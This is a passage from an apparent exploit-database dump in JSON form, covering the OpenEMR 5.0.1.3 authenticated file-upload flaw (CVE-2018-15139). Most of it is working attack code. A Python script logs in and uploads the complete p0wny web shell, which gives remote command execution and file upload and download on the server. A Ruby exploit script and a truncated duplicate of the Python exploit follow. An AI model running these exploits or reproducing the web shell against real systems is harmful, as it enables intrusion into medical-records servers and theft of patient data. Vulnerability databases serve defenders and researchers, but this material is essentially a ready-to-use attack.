\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\n \"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Content-Type\": \"multipart/form-data; boundary=---------------------------31900464228840324774249185339\",\n \"Origin\": \"http://\" + target_ip,\n \"Connection\": \"close\",\n \"Referer\": 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php',\n \"Upgrade-Insecure-Requests\": \"1\"\n}\n\n# Body (Exploit):\nbody = \"-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_filename\\\"\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_filedata\\\"\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"MAX_FILE_SIZE\\\"\\r\\n\\r\\n12000000\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_image\\\"; filename=\\\"shell.php\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n<?php\\n\\nfunction featureShell($cmd, $cwd) {\\n $stdout = array();\\n\\n if (preg_match(\\\"/^\\\\s*cd\\\\s*$/\\\", $cmd)) {\\n // pass\\n } elseif (preg_match(\\\"/^\\\\s*cd\\\\s+(.+)\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*cd\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n chdir($match[1]);\\n } elseif (preg_match(\\\"/^\\\\s*download\\\\s+[^\\\\s]+\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*download\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n return featureDownload($match[1]);\\n } else {\\n chdir($cwd);\\n exec($cmd, $stdout);\\n }\\n\\n return array(\\n \\\"stdout\\\" => $stdout,\\n \\\"cwd\\\" => getcwd()\\n );\\n}\\n\\nfunction featurePwd() {\\n return array(\\\"cwd\\\" => getcwd());\\n}\\n\\nfunction featureHint($fileName, $cwd, $type) {\\n chdir($cwd);\\n if ($type == 'cmd') {\\n $cmd = \\\"compgen -c $fileName\\\";\\n } else {\\n $cmd = \\\"compgen -f $fileName\\\";\\n }\\n $cmd = \\\"/bin/bash -c \\\\\\\"$cmd\\\\\\\"\\\";\\n $files = explode(\\\"\\\\n\\\", shell_exec($cmd));\\n return array(\\n 'files' => $files,\\n );\\n}\\n\\nfunction featureDownload($filePath) {\\n $file = @file_get_contents($filePath);\\n if ($file === FALSE) {\\n return array(\\n 'stdout' => array('File not found / no read permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n return array(\\n 'name' => basename($filePath),\\n 'file' => base64_encode($file)\\n );\\n }\\n}\\n\\nfunction featureUpload($path, $file, $cwd) {\\n chdir($cwd);\\n $f = @fopen($path, 'wb');\\n if ($f === FALSE) {\\n return array(\\n 'stdout' => array('Invalid path / no write permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n fwrite($f, base64_decode($file));\\n fclose($f);\\n return array(\\n 'stdout' => array('Done.'),\\n 'cwd' => getcwd()\\n );\\n }\\n}\\n\\nif (isset($_GET[\\\"feature\\\"])) {\\n\\n $response = NULL;\\n\\n switch ($_GET[\\\"feature\\\"]) {\\n case \\\"shell\\\":\\n $cmd = $_POST['cmd'];\\n if (!preg_match('/2>/', $cmd)) {\\n $cmd .= ' 2>&1';\\n }\\n $response = featureShell($cmd, $_POST[\\\"cwd\\\"]);\\n break;\\n case \\\"pwd\\\":\\n $response = featurePwd();\\n break;\\n case \\\"hint\\\":\\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\\n break;\\n case 'upload':\\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\\n }\\n\\n header(\\\"Content-Type: application/json\\\");\\n echo json_encode($response);\\n die();\\n}\\n\\n?><!DOCTYPE html>\\n\\n<html>\\n\\n <head>\\n <meta charset=\\\"UTF-8\\\" />\\n <title>[email\u00a0protected]:~#</title>\\n <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\" />\\n <style>\\n html, body {\\n margin: 0;\\n padding: 0;\\n background: #333;\\n color: #eee;\\n font-family: monospace;\\n }\\n\\n *::-webkit-scrollbar-track {\\n border-radius: 8px;\\n background-color: #353535;\\n }\\n\\n *::-webkit-scrollbar {\\n width: 8px;\\n height: 8px;\\n }\\n\\n *::-webkit-scrollbar-thumb {\\n border-radius: 8px;\\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\\n background-color: #bcbcbc;\\n }\\n\\n #shell {\\n background: #222;\\n max-width: 800px;\\n margin: 50px auto 0 auto;\\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\\n font-size: 10pt;\\n display: flex;\\n flex-direction: column;\\n align-items: stretch;\\n }\\n\\n #shell-content {\\n height: 500px;\\n overflow: auto;\\n padding: 5px;\\n white-space: pre-wrap;\\n flex-grow: 1;\\n }\\n\\n #shell-logo {\\n font-weight: bold;\\n color: #FF4180;\\n text-align: center;\\n }\\n\\n @media (max-width: 991px) {\\n #shell-logo {\\n font-size: 6px;\\n margin: -25px 0;\\n }\\n\\n html, body, #shell {\\n height: 100%;\\n width: 100%;\\n max-width: none;\\n }\\n\\n #shell {\\n margin-top: 0;\\n }\\n }\\n\\n @media (max-width: 767px) {\\n #shell-input {\\n flex-direction: column;\\n }\\n }\\n\\n @media (max-width: 320px) {\\n #shell-logo {\\n font-size: 5px;\\n }\\n }\\n\\n .shell-prompt {\\n font-weight: bold;\\n color: #75DF0B;\\n }\\n\\n .shell-prompt > span {\\n color: #1BC9E7;\\n }\\n\\n #shell-input {\\n display: flex;\\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\\n border-top: rgba(255, 255, 255, .05) solid 1px;\\n }\\n\\n #shell-input > label {\\n flex-grow: 0;\\n display: block;\\n padding: 0 5px;\\n height: 30px;\\n line-height: 30px;\\n }\\n\\n #shell-input #shell-cmd {\\n height: 30px;\\n line-height: 30px;\\n border: none;\\n background: transparent;\\n color: #eee;\\n font-family: monospace;\\n font-size: 10pt;\\n width: 100%;\\n align-self: center;\\n }\\n\\n #shell-input div {\\n flex-grow: 1;\\n align-items: stretch;\\n }\\n\\n #shell-input input {\\n outline: none;\\n }\\n </style>\\n\\n <script>\\n var CWD = null;\\n var commandHistory = [];\\n var historyPosition = 0;\\n var eShellCmdInput = null;\\n var eShellContent = null;\\n\\n function _insertCommand(command) {\\n eShellContent.innerHTML += \\\"\\\\n\\\\n\\\";\\n eShellContent.innerHTML += '<span class=\\\\\\\"shell-prompt\\\\\\\">' + genPrompt(CWD) + '</span> ';\\n eShellContent.innerHTML += escapeHtml(command);\\n eShellContent.innerHTML += \\\"\\\\n\\\";\\n eShellContent.scrollTop = eShellContent.scrollHeight;\\n }\\n\\n function _insertStdout(stdout) {\\n eShellContent.innerHTML += escapeHtml(stdout);\\n eShellContent.scrollTop = eShellContent.scrollHeight;\\n }\\n\\n function _defer(callback) {\\n setTimeout(callback, 0);\\n }\\n\\n function featureShell(command) {\\n\\n _insertCommand(command);\\n if (/^\\\\s*upload\\\\s+[^\\\\s]+\\\\s*$/.test(command)) {\\n featureUpload(command.match(/^\\\\s*upload\\\\s+([^\\\\s]+)\\\\s*$/)[1]);\\n } else if (/^\\\\s*clear\\\\s*$/.test(command)) {\\n // Backend shell TERM environment variable not set. Clear command history from UI but keep in buffer\\n eShellContent.innerHTML = '';\\n } else {\\n makeRequest(\\\"?feature=shell\\\", {cmd: command, cwd: CWD}, function (response) {\\n if (response.hasOwnProperty('file')) {\\n featureDownload(response.name, response.file)\\n } else {\\n _insertStdout(response.stdout.join(\\\"\\\\n\\\"));\\n updateCwd(response.cwd);\\n }\\n });\\n }\\n }\\n\\n function featureHint() {\\n if (eShellCmdInput.value.trim().length === 0) return; // field is empty -> nothing to complete\\n\\n function _requestCallback(data) {\\n if (data.files.length <= 1) return; // no completion\\n\\n if (data.files.length === 2) {\\n if (type === 'cmd') {\\n eShellCmdInput.value = data.files[0];\\n } else {\\n var currentValue = eShellCmdInput.value;\\n eShellCmdInput.value = currentValue.replace(/([^\\\\s]*)$/, data.files[0]);\\n }\\n } else {\\n _insertCommand(eShellCmdInput.value);\\n _insertStdout(data.files.join(\\\"\\\\n\\\"));\\n }\\n }\\n\\n var currentCmd = eShellCmdInput.value.split(\\\" \\\");\\n var type = (currentCmd.length === 1) ? \\\"cmd\\\" : \\\"file\\\";\\n var fileName = (type === \\\"cmd\\\") ? currentCmd[0] : currentCmd[currentCmd.length - 1];\\n\\n makeRequest(\\n \\\"?feature=hint\\\",\\n {\\n filename: fileName,\\n cwd: CWD,\\n type: type\\n },\\n _requestCallback\\n );\\n\\n }\\n\\n function featureDownload(name, file) {\\n var element = document.createElement('a');\\n element.setAttribute('href', 'data:application/octet-stream;base64,' + file);\\n element.setAttribute('download', name);\\n element.style.display = 'none';\\n document.body.appendChild(element);\\n element.click();\\n document.body.removeChild(element);\\n _insertStdout('Done.');\\n }\\n\\n function featureUpload(path) {\\n var element = document.createElement('input');\\n element.setAttribute('type', 'file');\\n element.style.display = 'none';\\n document.body.appendChild(element);\\n element.addEventListener('change', function () {\\n var promise = getBase64(element.files[0]);\\n promise.then(function (file) {\\n makeRequest('?feature=upload', {path: path, file: file, cwd: CWD}, function (response) {\\n _insertStdout(response.stdout.join(\\\"\\\\n\\\"));\\n updateCwd(response.cwd);\\n });\\n }, function () {\\n _insertStdout('An unknown client-side error occurred.');\\n });\\n });\\n element.click();\\n document.body.removeChild(element);\\n }\\n\\n function getBase64(file, onLoadCallback) {\\n return new Promise(function(resolve, reject) {\\n var reader = new FileReader();\\n reader.onload = function() { resolve(reader.result.match(/base64,(.*)$/)[1]); };\\n reader.onerror = reject;\\n reader.readAsDataURL(file);\\n });\\n }\\n\\n function genPrompt(cwd) {\\n cwd = cwd || \\\"~\\\";\\n var shortCwd = cwd;\\n if (cwd.split(\\\"/\\\").length > 3) {\\n var splittedCwd = cwd.split(\\\"/\\\");\\n shortCwd = \\\"\\xe2\\x80\\xa6/\\\" + splittedCwd[splittedCwd.length-2] + \\\"/\\\" + splittedCwd[splittedCwd.length-1];\\n }\\n return \\\"[email\u00a0protected]:<span title=\\\\\\\"\\\" + cwd + \\\"\\\\\\\">\\\" + shortCwd + \\\"</span>#\\\";\\n }\\n\\n function updateCwd(cwd) {\\n if (cwd) {\\n CWD = cwd;\\n _updatePrompt();\\n return;\\n }\\n makeRequest(\\\"?feature=pwd\\\", {}, function(response) {\\n CWD = response.cwd;\\n _updatePrompt();\\n });\\n\\n }\\n\\n function escapeHtml(string) {\\n return string\\n .replace(/&/g, \\\"&\\\")\\n .replace(/</g, \\\"<\\\")\\n .replace(/>/g, \\\">\\\");\\n }\\n\\n function _updatePrompt() {\\n var eShellPrompt = document.getElementById(\\\"shell-prompt\\\");\\n eShellPrompt.innerHTML = genPrompt(CWD);\\n }\\n\\n function _onShellCmdKeyDown(event) {\\n switch (event.key) {\\n case \\\"Enter\\\":\\n featureShell(eShellCmdInput.value);\\n insertToHistory(eShellCmdInput.value);\\n eShellCmdInput.value = \\\"\\\";\\n break;\\n case \\\"ArrowUp\\\":\\n if (historyPosition > 0) {\\n historyPosition--;\\n eShellCmdInput.blur();\\n eShellCmdInput.value = commandHistory[historyPosition];\\n _defer(function() {\\n eShellCmdInput.focus();\\n });\\n }\\n break;\\n case \\\"ArrowDown\\\":\\n if (historyPosition >= commandHistory.length) {\\n break;\\n }\\n historyPosition++;\\n if (historyPosition === commandHistory.length) {\\n eShellCmdInput.value = \\\"\\\";\\n } else {\\n eShellCmdInput.blur();\\n eShellCmdInput.focus();\\n eShellCmdInput.value = commandHistory[historyPosition];\\n }\\n break;\\n case 'Tab':\\n event.preventDefault();\\n featureHint();\\n break;\\n }\\n }\\n\\n function insertToHistory(cmd) {\\n commandHistory.push(cmd);\\n historyPosition = commandHistory.length;\\n }\\n\\n function makeRequest(url, params, callback) {\\n function getQueryString() {\\n var a = [];\\n for (var key in params) {\\n if (params.hasOwnProperty(key)) {\\n a.push(encodeURIComponent(key) + \\\"=\\\" + encodeURIComponent(params[key]));\\n }\\n }\\n return a.join(\\\"&\\\");\\n }\\n var xhr = new XMLHttpRequest();\\n xhr.open(\\\"POST\\\", url, true);\\n xhr.setRequestHeader(\\\"Content-Type\\\", \\\"application/x-www-form-urlencoded\\\");\\n xhr.onreadystatechange = function() {\\n if (xhr.readyState === 4 && xhr.status === 200) {\\n try {\\n var responseJson = JSON.parse(xhr.responseText);\\n callback(responseJson);\\n } catch (error) {\\n alert(\\\"Error while parsing response: \\\" + error);\\n }\\n }\\n };\\n xhr.send(getQueryString());\\n }\\n\\n document.onclick = function(event) {\\n event = event || window.event;\\n var selection = window.getSelection();\\n var target = event.target || event.srcElement;\\n\\n if (target.tagName === \\\"SELECT\\\") {\\n return;\\n }\\n\\n if (!selection.toString()) {\\n eShellCmdInput.focus();\\n }\\n };\\n\\n window.onload = function() {\\n eShellCmdInput = document.getElementById(\\\"shell-cmd\\\");\\n eShellContent = document.getElementById(\\\"shell-content\\\");\\n updateCwd();\\n eShellCmdInput.focus();\\n };\\n </script>\\n </head>\\n\\n <body>\\n <div id=\\\"shell\\\">\\n <pre id=\\\"shell-content\\\">\\n <div id=\\\"shell-logo\\\">\\n ___ ____ _ _ _ _ _ <span></span>\\n _ __ / _ \\\\__ ___ __ _ _ / __ \\\\ ___| |__ ___| | |_ /\\\\/|| || |_ <span></span>\\n| '_ \\\\| | | \\\\ \\\\ /\\\\ / / '_ \\\\| | | |/ / _` / __| '_ \\\\ / _ \\\\ | (_)/\\\\/_ .. _|<span></span>\\n| |_) | |_| |\\\\ V V /| | | | |_| | | (_| \\\\__ \\\\ | | | __/ | |_ |_ _|<span></span>\\n| .__/ \\\\___/ \\\\_/\\\\_/ |_| |_|\\\\__, |\\\\ \\\\__,_|___/_| |_|\\\\___|_|_(_) |_||_| <span></span>\\n|_| |___/ \\\\____/ <span></span>\\n </div>\\n </pre>\\n <div id=\\\"shell-input\\\">\\n <label for=\\\"shell-cmd\\\" id=\\\"shell-prompt\\\" class=\\\"shell-prompt\\\">???</label>\\n <div>\\n <input id=\\\"shell-cmd\\\" name=\\\"cmd\\\" onkeydown=\\\"_onShellCmdKeyDown(event)\\\"/>\\n </div>\\n </div>\\n </div>\\n </body>\\n\\n</html>\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_dest_filename\\\"\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_education\\\"; filename=\\\"\\\"\\r\\nContent-Type: application/octet-stream\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"bn_save\\\"\\r\\n\\r\\nSave\\r\\n-----------------------------31900464228840324774249185339--\\r\\n\"\n\n# Send Exploit:\nsession.post(exploit_url, headers=header, data=body)\n\n# Finish\npath = 'http://' + target_ip + ':' + target_port + openemr_path + '/sites/default/images/shell.php'\nprint('[+] Webshell: ' + path)\n", "sourceHref": "https://0day.today/exploit/36407", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-12-20T11:35:52", "description": "", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-13T00:00:00", "type": "zdt", "title": "OpenEMR 5.0.1.3 - (manage_site_files) Remote Code Execution (Authenticated) Exploit (2)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-15139", "CVE-2019-14530"], "modified": "2021-07-13T00:00:00", "id": "1337DAY-ID-36549", "href": "https://0day.today/exploit/description/36549", "sourceData": "# Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)\n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)\n# Vendor Homepage: https://www.open-emr.org/\n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz\n# Docker PoC: https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml\n# Version: < 5.0.1.4 (it means up to 5.0.1.3)\n# Tested on: OpenEMR Version 5.0.0.8\n# References: https://www.exploit-db.com/exploits/49998\n# CVE: CVE-2018-15139\n# CWE: CWE-434\n# Patch: https://github.com/openemr/openemr/pull/1757/commits/c2808a0493243f618bbbb3459af23c7da3dc5485\n\n#!/usr/bin/env ruby\n\nrequire 'pathname'\nrequire 'httpx'\nrequire 'http/form_data'\nrequire 'docopt'\n\ndoc = <<~DOCOPT\n OpenEMR < 5.0.1.4 - (Authenticated) File upload - Remote command execution\n\n Source: https://github.com/sec-it/exploit-CVE-2019-14530\n\n Usage:\n #{__FILE__} exploit <url> <filename> <username> <password> [--debug]\n #{__FILE__} -h | --help\n\n Options:\n <url> Root URL (base path) including HTTP scheme, port and root folder\n <filename> Filename of the shell to be uploaded\n <username> Username of the admin\n <password> Password of the admin\n --debug Display arguments\n -h, --help Show this screen\n\n Examples:\n #{__FILE__} exploit http://example.org/openemr shell.php admin pass\n #{__FILE__} exploit https://example.org:5000/ shell.php admin pass\nDOCOPT\n\ndef login(root_url, user, pass, http)\n vuln_url = \"#{root_url}/interface/main/main_screen.php?auth=login&site=default\"\n params = {\n 'new_login_session_management' => '1',\n 'authProvider' => 'Default',\n 'authUser' => user,\n 'clearPass' => pass,\n 'languageChoice' => '1'\n }\n\n http.post(vuln_url, form: params).body.to_s\nend\n\ndef upload(root_url, filepath, http)\n vuln_url = \"#{root_url}/interface/super/manage_site_files.php\"\n pn = Pathname.new(filepath)\n\n params = {\n form_image: {\n content_type: 'application/x-php',\n filename: pn.basename.to_s,\n body: pn\n },\n bn_save: 'Save'\n }\n\n res = http.post(vuln_url, form: params)\n\n return '[-] File not upload' unless (200..299).include?(res.status)\n\n \"[+] File uploaded:\\n#{root_url}/sites/default/images/#{pn.basename}\"\nend\n\nbegin\n args = Docopt.docopt(doc)\n pp args if args['--debug']\n\n if args['exploit']\n http = HTTPX.plugin(:cookies).plugin(:follow_redirects).plugin(:multipart)\n login(args['<url>'], args['<username>'], args['<password>'], http)\n puts upload(args['<url>'], args['<filename>'], http)\n end\nrescue Docopt::Exit => e\n puts e.message\nend\n", "sourceHref": "https://0day.today/exploit/36549", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2021-06-14T16:03:07", "description": "", "cvss3": {}, "published": "2021-06-14T00:00:00", "type": "packetstorm", "title": "OpenEMR 5.0.1.3 Shell Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-15139"], "modified": "2021-06-14T00:00:00", "id": "PACKETSTORM:163110", "href": "https://packetstormsecurity.com/files/163110/OpenEMR-5.0.1.3-Shell-Upload.html", "sourceData": "`# Exploit Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) \n# Date 12.06.2021 \n# Exploit Author: Ron Jost (Hacker5preme) \n# Vendor Homepage: https://www.open-emr.org/ \n# Software Link: https://github.com/openemr/openemr/archive/refs/tags/v5_0_1_3.zip \n# Version: Prior to 5.0.1.4 \n# Tested on: Ubuntu 18.04 \n# CVE: CVE-2018-15139 \n# CWE: CWE-434 \n# Documentation: https://github.com/Hacker5preme/Exploits#CVE-2018-15139 \n \n''' \nDescription: \nUnrestricted file upload in interface/super/manage_site_files.php in versions of OpenEMR before 5.0.1.4 allows a remote \nauthenticated attacker to execute arbitrary PHP code by uploading a file with a PHP extension via the images upload \nform and accessing it in the images directory. \n''' \n \n \n''' \nBanner: \n''' \nbanner =\"\"\" \n___ _____ __ __ ____ ____ ___ _ _____ \n/ _ \\ _ __ ___ _ __ | ____| \\/ | _ \\ | ___| / _ \\ / | |___ / \n| | | | '_ \\ / _ \\ '_ \\| _| | |\\/| | |_) | _____ |___ \\| | | || | |_ \\ \n| |_| | |_) | __/ | | | |___| | | | _ < |_____| ___) | |_| || |_ ___) | \n\\___/| .__/ \\___|_| |_|_____|_| |_|_| \\_\\ |____(_)___(_)_(_)____/ \n|_| \n \n_____ _ _ _ \n| ____|_ ___ __ | | ___ (_) |_ \n| _| \\ \\/ / '_ \\| |/ _ \\| | __| \n| |___ > <| |_) | | (_) | | |_ \n|_____/_/\\_\\ .__/|_|\\___/|_|\\__| \n|_| \n \n\"\"\" \nprint(banner) \n \n \n''' \nImport required modules \n''' \nimport argparse \nimport requests \n \n \n''' \nUser-Input: \n''' \nmy_parser = argparse.ArgumentParser(description='OpenEMR Remote Code Execution') \nmy_parser.add_argument('-T', '--IP', type=str) \nmy_parser.add_argument('-P', '--PORT', type=str) \nmy_parser.add_argument('-U', '--PATH', type=str) \nmy_parser.add_argument('-u', '--USERNAME', type=str) \nmy_parser.add_argument('-p', '--PASSWORD', type=str) \nargs = my_parser.parse_args() \ntarget_ip = args.IP \ntarget_port = args.PORT \nopenemr_path = args.PATH \nusername = args.USERNAME \npassword = args.PASSWORD \n \n''' \nAuthentication: \n''' \n# Preparation: \nsession = requests.Session() \nauth_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/main/main_screen.php?auth=login&site=default' \nauth_chek_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/login/login.php?site=default' \nresponse = session.get(auth_chek_url) \n \n# Header (auth): \nheader = { \n'Host': target_ip, \n'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0', \n'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', \n'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', \n'Accept-Encoding': 'gzip, deflate', \n'Content-Type': 'application/x-www-form-urlencoded', \n'Origin': 'http://' + target_ip, \n'Connection': 'close', \n'Referer': auth_chek_url, \n'Upgrade-Insecure-Requests': '1', \n} \n \n# Body (auth): \nbody = { \n'new_login_session_management': '1', \n'authProvider': 'Default', \n'authUser': username, \n'clearPass': password, \n'languageChoice': '1' \n} \n \n# Authentication: \nprint('') \nprint('[+] Authentication') \nauth = session.post(auth_url,headers=header, data=body) \n \n \n''' \nExploit: \n''' \nprint('') \nprint('[+] Uploading Webshell:') \n \n# URL: \nexploit_url = 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php' \n \n# Headers (Exploit): \nheader = { \n\"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0\", \n\"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \n\"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\", \n\"Accept-Encoding\": \"gzip, deflate\", \n\"Content-Type\": \"multipart/form-data; boundary=---------------------------31900464228840324774249185339\", \n\"Origin\": \"http://\" + target_ip, \n\"Connection\": \"close\", \n\"Referer\": 'http://' + target_ip + ':' + target_port + openemr_path + '/interface/super/manage_site_files.php', \n\"Upgrade-Insecure-Requests\": \"1\" \n} \n \n# Body (Exploit): \nbody = \"-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_filename\\\"\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_filedata\\\"\\r\\n\\r\\n\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"MAX_FILE_SIZE\\\"\\r\\n\\r\\n12000000\\r\\n-----------------------------31900464228840324774249185339\\r\\nContent-Disposition: form-data; name=\\\"form_image\\\"; filename=\\\"shell.php\\\"\\r\\nContent-Type: application/x-php\\r\\n\\r\\n<?php\\n\\nfunction featureShell($cmd, $cwd) {\\n $stdout = array();\\n\\n if (preg_match(\\\"/^\\\\s*cd\\\\s*$/\\\", $cmd)) {\\n // pass\\n } elseif (preg_match(\\\"/^\\\\s*cd\\\\s+(.+)\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*cd\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n chdir($match[1]);\\n } elseif (preg_match(\\\"/^\\\\s*download\\\\s+[^\\\\s]+\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*download\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n return featureDownload($match[1]);\\n } else {\\n chdir($cwd);\\n exec($cmd, $stdout);\\n }\\n\\n return array(\\n \\\"stdout\\\" => $stdout,\\n \\\"cwd\\\" => getcwd()\\n );\\n}\\n\\nfunction featurePwd() {\\n return array(\\\"cwd\\\" => getcwd());\\n}\\n\\nfunction featureHint($fileName, $cwd, $type) {\\n chdir($cwd);\\n if ($type == 'cmd') {\\n $cmd = \\\"compgen -c $fileName\\\";\\n } else {\\n $cmd = \\\"compgen -f $fileName\\\";\\n }\\n $cmd = \\\"/bin/bash -c \\\\\\\"$cmd\\\\\\\"\\\";\\n $files = explode(\\\"\\\\n\\\", shell_exec($cmd));\\n return array(\\n 'files' => $files,\\n );\\n}\\n\\nfunction featureDownload($filePath) {\\n $file = @file_get_contents($filePath);\\n if ($file === FALSE) {\\n return array(\\n 'stdout' => array('File not found / no read permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n return array(\\n 'name' => basename($filePath),\\n 'file' => base64_encode($file)\\n );\\n }\\n}\\n\\nfunction featureUpload($path, $file, $cwd) {\\n chdir($cwd);\\n $f = @fopen($path, 'wb');\\n if ($f === FALSE) {\\n return array(\\n 'stdout' => array('Invalid path / no write permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n fwrite($f, base64_decode($file));\\n fclose($f);\\n return array(\\n 'stdout' => array('Done.'),\\n 'cwd' => getcwd()\\n );\\n }\\n}\\n\\nif (isset($_GET[\\\"feature\\\"])) {\\n\\n $response = NULL;\\n\\n switch ($_GET[\\\"feature\\\"]) {\\n case \\\"shell\\\":\\n $cmd = $_POST['cmd'];\\n if (!preg_match('/2>/', $cmd)) {\\n $cmd .= ' 2>&1';\\n }\\n $response = featureShell($cmd, $_POST[\\\"cwd\\\"]);\\n break;\\n case \\\"pwd\\\":\\n $response = featurePwd();\\n break;\\n case \\\"hint\\\":\\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\\n break;\\n case 'upload':\\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\\n }\\n\\n header(\\\"Content-Type: application/json\\\");\\n echo json_encode($response);\\n die();\\n}\\n\\n?><!DOCTYPE html>\\n\\n<html>\\n\\n <head>\\n <meta charset=\\\"UTF-8\\\" />\\n <title>p0wny@shell:~#</title>\\n <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\" />\\n <style>\\n html, body {\\n margin: 0;\\n padding: 0;\\n background: #333;\\n color: #eee;\\n font-family: monospace;\\n }\\n\\n *::-webkit-scrollbar-track {\\n border-radius: 8px;\\n background-color: #353535;\\n }\\n\\n *::-webkit-scrollbar {\\n width: 8px;\\n height: 8px;\\n }\\n\\n *::-webkit-scrollbar-thumb {\\n border-radi \n \n# Send Exploit: \nsession.post(exploit_url, headers=header, data=body) \n \n# Finish \npath = 'http://' + target_ip + ':' + target_port + openemr_path + '/sites/default/images/shell.php' \nprint('[+] Webshell: ' + path) \n \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/163110/openemr5013-shell.txt"}, {"lastseen": "2021-07-13T16:00:46", "description": "", "cvss3": {}, "published": "2021-07-13T00:00:00", "type": "packetstorm", "title": "OpenEMR 5.0.1.3 Shell Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2018-15139", "CVE-2019-14530"], "modified": "2021-07-13T00:00:00", "id": "PACKETSTORM:163482", "href": "https://packetstormsecurity.com/files/163482/OpenEMR-5.0.1.3-Shell-Upload.html", "sourceData": "`# Title: OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2) \n# Exploit author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr) \n# Date: 2021-07-05 \n# Vendor Homepage: https://www.open-emr.org/ \n# Software Link: https://github.com/openemr/openemr/archive/v5_0_1_3.tar.gz \n# Docker PoC: https://github.com/sec-it/exploit-CVE-2018-15139/blob/master/docker-compose.yml \n# Version: < 5.0.1.4 (it means up to 5.0.1.3) 